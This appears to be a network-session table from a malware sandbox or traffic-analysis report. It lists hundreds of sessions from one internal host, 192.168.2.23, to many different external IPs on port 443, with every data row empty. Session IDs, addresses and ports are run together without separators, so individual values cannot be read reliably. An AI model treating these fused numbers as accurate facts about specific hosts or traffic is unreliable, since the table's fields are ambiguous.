                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25442192.168.2.2352346171.212.132.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25443192.168.2.2353520118.61.103.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25444192.168.2.236007061.172.78.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25445192.168.2.235869838.199.25.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25446192.168.2.2360748114.68.47.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25447192.168.2.23380685.158.119.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25448192.168.2.2338128151.176.124.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25449192.168.2.2333150177.86.31.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25450192.168.2.2343546188.212.136.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25451192.168.2.233792066.246.43.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25452192.168.2.2348194219.171.208.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25453192.168.2.2335408216.51.226.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25454192.168.2.2335330155.190.141.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25455192.168.2.2348542173.205.3.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25456192.168.2.234041089.80.15.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25457192.168.2.233695479.50.5.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25458192.168.2.2348892202.49.50.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25459192.168.2.2345950186.97.237.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25460192.168.2.23547789.149.149.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25461192.168.2.235655876.137.123.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25462192.168.2.233962260.188.97.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25463192.168.2.233939496.132.173.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25464192.168.2.234323639.160.42.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25465192.168.2.2351150140.180.162.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25466192.168.2.234779494.100.11.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25467192.168.2.234427251.207.219.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25468192.168.2.2351680128.177.227.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25469192.168.2.2335138105.14.205.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25470192.168.2.234034025.24.232.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25471192.168.2.235805444.229.185.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25472192.168.2.23476422.153.169.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25473192.168.2.235065850.79.10.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25474192.168.2.2350582176.214.3.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25475192.168.2.2348080133.122.24.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25476192.168.2.235595684.139.198.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25477192.168.2.235213244.23.132.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25478192.168.2.234590090.37.97.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25479192.168.2.235733045.119.28.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25480192.168.2.233472648.110.235.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25481192.168.2.2345906156.15.53.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25482192.168.2.235852889.84.26.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25483192.168.2.2346140110.180.214.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25484192.168.2.2342052106.2.171.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25485192.168.2.2350486143.76.105.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25486192.168.2.2343608101.14.27.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25487192.168.2.234879290.57.246.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25488192.168.2.2343692180.114.22.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25489192.168.2.235720479.37.128.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25490192.168.2.2343040170.236.156.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25491192.168.2.233715290.16.184.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25492192.168.2.2360262118.37.46.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25493192.168.2.2345678171.210.1.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25494192.168.2.235105013.169.25.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25495192.168.2.2333078124.180.88.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25496192.168.2.234199249.76.252.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25497192.168.2.2358926164.55.10.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25498192.168.2.2350502186.18.130.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25499192.168.2.2356540162.100.27.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25500192.168.2.233541882.72.69.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25501192.168.2.233755841.25.77.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25502192.168.2.2342448131.115.44.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25503192.168.2.233891878.188.170.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25504192.168.2.233734281.176.47.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25505192.168.2.2346230118.66.171.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25506192.168.2.235794236.70.202.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25507192.168.2.235667012.112.1.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25508192.168.2.235227295.41.30.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25509192.168.2.2354482125.199.250.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25510192.168.2.235646041.86.135.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25511192.168.2.2358134153.129.24.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25512192.168.2.2355776195.112.113.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25513192.168.2.233507881.99.177.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25514192.168.2.2360200131.210.129.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25515192.168.2.235901876.128.102.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25516192.168.2.235870214.154.207.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25517192.168.2.234716068.29.151.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25518192.168.2.2337262210.71.23.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25519192.168.2.235678645.186.55.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25520192.168.2.235882614.94.209.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25521192.168.2.233474859.209.159.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25522192.168.2.235813836.33.215.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25523192.168.2.2355064115.54.217.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25524192.168.2.233358425.187.158.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25525192.168.2.2355526170.139.122.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25526192.168.2.2355320145.252.201.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25527192.168.2.2358438138.80.42.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25528192.168.2.2335142112.251.161.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25529192.168.2.235848074.191.199.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25530192.168.2.2344998195.189.180.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25531192.168.2.2332852191.13.148.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25532192.168.2.2343376167.186.202.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25533192.168.2.234597439.255.80.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25534192.168.2.235594043.41.109.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25535192.168.2.234777212.14.245.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25536192.168.2.2344288196.40.247.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25537192.168.2.2347338188.4.105.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25538192.168.2.2343408174.178.111.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25539192.168.2.234322289.43.210.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25540192.168.2.2337906177.236.127.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25541192.168.2.2333606218.158.205.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25542192.168.2.2342006187.218.225.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25543192.168.2.2346332167.217.246.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25544192.168.2.2354280160.239.18.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25545192.168.2.235786699.122.16.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25546192.168.2.23443429.50.253.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25547192.168.2.2336736223.5.249.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25548192.168.2.233913091.110.77.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25549192.168.2.235038086.70.104.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25550192.168.2.2360640109.225.111.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25551192.168.2.2340170135.101.238.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25552192.168.2.2360094111.99.229.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25553192.168.2.2343786220.195.51.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25554192.168.2.233810088.74.127.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25555192.168.2.2354078124.58.47.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25556192.168.2.233624020.2.50.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25557192.168.2.235988646.9.176.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25558192.168.2.2358638218.92.8.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25559192.168.2.234087483.178.95.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25560192.168.2.2347940128.138.190.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25561192.168.2.234638061.201.219.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25562192.168.2.234471268.158.166.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25563192.168.2.23385705.111.96.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25564192.168.2.235485627.156.208.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25565192.168.2.235957046.165.238.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25566192.168.2.233742232.172.110.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25567192.168.2.235154680.154.34.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25568192.168.2.233912852.154.43.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25569192.168.2.2345208118.25.209.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25570192.168.2.2345698122.37.102.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25571192.168.2.2334592148.159.220.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25572192.168.2.2336020132.2.113.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25573192.168.2.2337298223.202.68.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25574192.168.2.2350492201.32.211.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25575192.168.2.2343402108.231.92.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25576192.168.2.233645874.25.208.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25577192.168.2.2346232120.25.176.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25578192.168.2.2351192200.5.7.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25579192.168.2.2343932221.86.96.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25580192.168.2.2353974152.94.42.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25581192.168.2.2344316129.174.21.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25582192.168.2.2357976136.122.239.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25583192.168.2.234664036.238.246.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25584192.168.2.2345268124.174.183.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25585192.168.2.235100619.5.152.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25586192.168.2.233656880.18.239.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25587192.168.2.2358590122.99.56.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25588192.168.2.2341622147.79.219.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25589192.168.2.2336704198.58.60.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25590192.168.2.2355156177.208.29.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25591192.168.2.2339142110.59.61.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25592192.168.2.2348970116.116.185.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25593192.168.2.2349108119.39.194.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25594192.168.2.234247241.7.71.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25595192.168.2.233619046.250.217.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25596192.168.2.2349738201.168.57.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25597192.168.2.234155667.93.23.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25598192.168.2.235941441.231.142.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25599192.168.2.2349446202.118.58.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25600192.168.2.235316083.215.168.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25601192.168.2.2351390161.6.71.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25602192.168.2.2333318206.207.132.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25603192.168.2.2360856208.177.183.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25604192.168.2.234054673.156.26.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25605192.168.2.2349182222.30.208.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25606192.168.2.2357442119.85.170.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25607192.168.2.2334340130.107.155.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25608192.168.2.234802214.151.37.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25609192.168.2.2332786174.116.80.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25610192.168.2.2358562165.159.172.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25611192.168.2.2338008169.8.197.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25612192.168.2.234674046.215.207.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25613192.168.2.2351836104.167.59.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25614192.168.2.235008034.253.245.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25615192.168.2.235865420.85.35.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25616192.168.2.2350488126.28.137.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25617192.168.2.234272013.122.226.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25618192.168.2.2346666202.34.187.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25619192.168.2.234695817.13.151.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25620192.168.2.2359324173.248.194.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25621192.168.2.2333832105.252.240.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25622192.168.2.235866879.127.191.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25623192.168.2.2341196168.53.204.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25624192.168.2.233883684.245.0.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25625192.168.2.2336886191.143.141.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25626192.168.2.234970081.246.58.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25627192.168.2.2357132174.206.181.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25628192.168.2.2338426144.254.217.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25629192.168.2.233916673.46.39.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25630192.168.2.235545888.196.78.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25631192.168.2.2351856183.223.209.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25632192.168.2.233944032.239.192.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25633192.168.2.234733251.192.80.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25634192.168.2.235653852.236.71.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25635192.168.2.234008871.8.186.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25636192.168.2.2360144165.7.7.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25637192.168.2.2351028120.139.57.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25638192.168.2.235054462.109.84.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25639192.168.2.234942688.61.67.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25640192.168.2.233961273.26.88.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25641192.168.2.235603054.66.55.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25642192.168.2.2334346181.204.1.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25643192.168.2.233631487.190.51.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25644192.168.2.2349096201.182.160.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25645192.168.2.233859823.224.81.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25646192.168.2.2356700115.16.95.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25647192.168.2.2353252203.31.161.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25648192.168.2.233749072.105.120.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25649192.168.2.235611060.5.141.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25650192.168.2.2344568188.143.212.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25651192.168.2.23569544.79.86.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25652192.168.2.235726042.136.124.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25653192.168.2.2341198187.140.93.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25654192.168.2.2357996179.24.6.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25655192.168.2.2355592217.124.244.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25656192.168.2.235502665.113.160.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25657192.168.2.2338176175.1.82.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25658192.168.2.2344938107.93.140.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25659192.168.2.2359978172.76.113.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25660192.168.2.2341854111.8.26.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25661192.168.2.233835824.15.252.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25662192.168.2.233461248.92.59.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25663192.168.2.2355132108.183.141.142443
                                            TimestampBytes transferredDirectionData


